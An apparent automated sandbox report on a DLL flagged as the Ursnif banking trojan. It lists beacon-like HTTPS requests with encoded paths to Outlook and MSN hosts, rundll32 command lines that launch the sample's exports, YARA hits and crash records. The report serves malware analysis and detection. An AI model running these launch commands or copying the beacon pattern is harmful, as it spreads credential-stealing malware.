2021-10-11 22:50:47 UTC | 0 | IN | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 56 6e 34 4a 76 6f 46 49 64 36 43 70 33 4e 4c 59 5a 2f 75 6b 66 43 57 57 63 78 63 68 50 6a 2f 71 43 55 63 41 37 67 34 70 38 6f 2f 49 7a 71 47 47 6e 67 5a 78 34 39 64 6b 54 2f 5f 32 46 63 33 73 45 42 42 58 76 41 45 59 6b 50 67 65 47 41 5f 2f 32 42 79 39 50 70 52 6f 4c 67 66 76 65 5f 32 46 2f 76 68 66 64 54 37 48 43 56 35 30 36 41 77 42 2f 33 36 6d
Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36m


Session ID: 1
Source IP: 192.168.2.3
Source Port: 49766
Destination IP: 13.82.28.61
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:00 UTC  1                   OUT        GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: msn.com
2021-10-11 22:51:00 UTC  1                   IN         HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre
    Server: Microsoft-IIS/8.5
    X-Powered-By: ASP.NET
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Date: Mon, 11 Oct 2021 22:50:59 GMT
    Connection: close
    Content-Length: 373
2021-10-11 22:51:00 UTC  2                   IN         Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 69 50 65 30 52 4a 72 33 59 52 6f 49 71 67 4a 5a 2f 62 70 32 39 47 31 47 7a 51 51 6c 47 4a 4d 5f 2f 32 46 75 4c 75 56 70 72 7a 61 50 77 30 53 45 34 48 4e 2f 7a 6e 37 4f 56 75 47 4b 73 2f 74 71 37 43 74 67 49 6c 6d 77 64 56 45 54 53 64 5a 5f 32 42 2f 62 38 55 55 61 52 34 79 41 35 6d 39 79 45 37 76 6b 61 31 2f 47 68 30 4a 74 76 75 41 54 72 56 6f 62
    Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVob


Session ID: 2
Source IP: 192.168.2.3
Source Port: 49779
Destination IP: 40.97.161.50
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:28 UTC  2                   OUT        GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: outlook.com
2021-10-11 22:51:28 UTC  2                   IN         HTTP/1.1 301 Moved Permanently
    Cache-Control: no-cache
    Pragma: no-cache
    Location: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
    Server: Microsoft-IIS/10.0
    request-id: 317cc244-0722-c41d-2bc6-bdaf257bb4d7
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-FEServer: MWHPR11CA0034
    X-RequestId: 46bbf0e0-7ef8-408f-a392-a9dc993be4c6
    MS-CV: RMJ8MSIHHcQrxr2vJXu01w.0
    X-Powered-By: ASP.NET
    X-FEServer: MWHPR11CA0034
    Date: Mon, 11 Oct 2021 22:51:28 GMT
    Connection: close
    Content-Length: 0


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49782
Destination IP: 52.98.207.210
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:28 UTC  3                   OUT        GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: www.outlook.com
2021-10-11 22:51:28 UTC  4                   IN         HTTP/1.1 301 Moved Permanently
    Cache-Control: no-cache
    Pragma: no-cache
    Location: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
    Server: Microsoft-IIS/10.0
    request-id: bbc58b63-0200-d637-1f82-5fe41ae08c7e
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-FEServer: AS9PR0301CA0054
    X-RequestId: 884c23bc-6988-4e6b-ba85-13b6a6e7802c
    MS-CV: Y4vFuwACN9Yfgl/kGuCMfg.0
    X-Powered-By: ASP.NET
    X-FEServer: AS9PR0301CA0054
    Date: Mon, 11 Oct 2021 22:51:28 GMT
    Connection: close
    Content-Length: 0


Session ID: 4
Source IP: 192.168.2.3
Source Port: 49783
Destination IP: 40.101.60.226
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:28 UTC  4                   OUT        GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: outlook.office365.com
2021-10-11 22:51:28 UTC  5                   IN         HTTP/1.1 404 Not Found
    Content-Length: 1245
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    request-id: f95b0919-28f4-47a7-648d-aec4a884b896
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-CalculatedFETarget: DB6PR07CU001.internal.outlook.com
    X-BackEndHttpStatus: 404
    X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COM
    X-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COM
    X-BackEndHttpStatus: 404
    X-RUM-Validated: 1
    X-Proxy-RoutingCorrectness: 1
    X-Proxy-BackendServerStatus: 404
    MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1
    X-FEServer: DB6PR07CA0023
    X-Powered-By: ASP.NET
    X-FEServer: AM5P194CA0003
    Date: Mon, 11 Oct 2021 22:51:28 GMT
    Connection: close
2021-10-11 22:51:28 UTC  6                   IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID: 5
Source IP: 192.168.2.3
Source Port: 49816
Destination IP: 40.97.161.50
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:43 UTC  7                   OUT        GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: outlook.com
2021-10-11 22:51:43 UTC  7                   IN         HTTP/1.1 301 Moved Permanently
    Cache-Control: no-cache
    Pragma: no-cache
    Location: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
    Server: Microsoft-IIS/10.0
    request-id: 2129bc54-af0a-cd98-b796-ce58b9a66f1a
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-FEServer: MWHPR11CA0044
    X-RequestId: 520fcc81-91de-431f-b63c-64a04ba5b2fa
    MS-CV: VLwpIQqvmM23ls5YuaZvGg.0
    X-Powered-By: ASP.NET
    X-FEServer: MWHPR11CA0044
    Date: Mon, 11 Oct 2021 22:51:43 GMT
    Connection: close
    Content-Length: 0


Session ID: 6
Source IP: 192.168.2.3
Source Port: 49820
Destination IP: 52.98.207.210
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-11 22:51:43 UTC  8                   OUT        GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: www.outlook.com
2021-10-11 22:51:43 UTC  8                   IN         HTTP/1.1 301 Moved Permanently
    Cache-Control: no-cache
    Pragma: no-cache
    Location: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
    Server: Microsoft-IIS/10.0
    request-id: dba8ebf3-3dce-76c0-0ac8-5a534885a9c6
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-FEServer: AS9PR0301CA0045
    X-RequestId: 7aae346b-564a-41f4-8c31-dc0c482e6c9d
    MS-CV: 8+uo2849wHYKyFpTSIWpxg.0
    X-Powered-By: ASP.NET
    X-FEServer: AS9PR0301CA0045
    Date: Mon, 11 Oct 2021 22:51:42 GMT
    Connection: close
    Content-Length: 0


Session ID: 7
Source IP: 192.168.2.3
Source Port: 49821
Destination IP: 40.101.60.226
Destination Port: 443
Process: C:\Windows\System32\loaddll32.exe

Timestamp: 2021-10-11 22:51:43 UTC
kBytes transferred: 9
Direction: OUT
Data:
GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com

Timestamp: 2021-10-11 22:51:43 UTC
kBytes transferred: 9
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedFETarget: PR3P195CU001.internal.outlook.com
X-BackEndHttpStatus: 404
X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COM
X-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-RUM-Validated: 1
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1
X-FEServer: PR3P195CA0027
X-Powered-By: ASP.NET
X-FEServer: AM5P194CA0015
Date: Mon, 11 Oct 2021 22:51:42 GMT
Connection: close

Timestamp: 2021-10-11 22:51:43 UTC
kBytes transferred: 10
Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 00:49:03
Start date: 12/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
Imagebase: 0x13b0000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 00:49:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
Imagebase: 0xd80000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:49:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
Imagebase: 0x1160000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:49:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
Imagebase: 0x1160000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:49:08
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
Imagebase: 0x1160000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:49:13
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
Imagebase: 0x1160000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 00:50:43
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
Imagebase: 0xe60000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 00:50:49
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
Imagebase: 0xe60000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                General

                                                                                                                                Start time:00:50:53
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Disassembly

                                                                                                                                Code Analysis
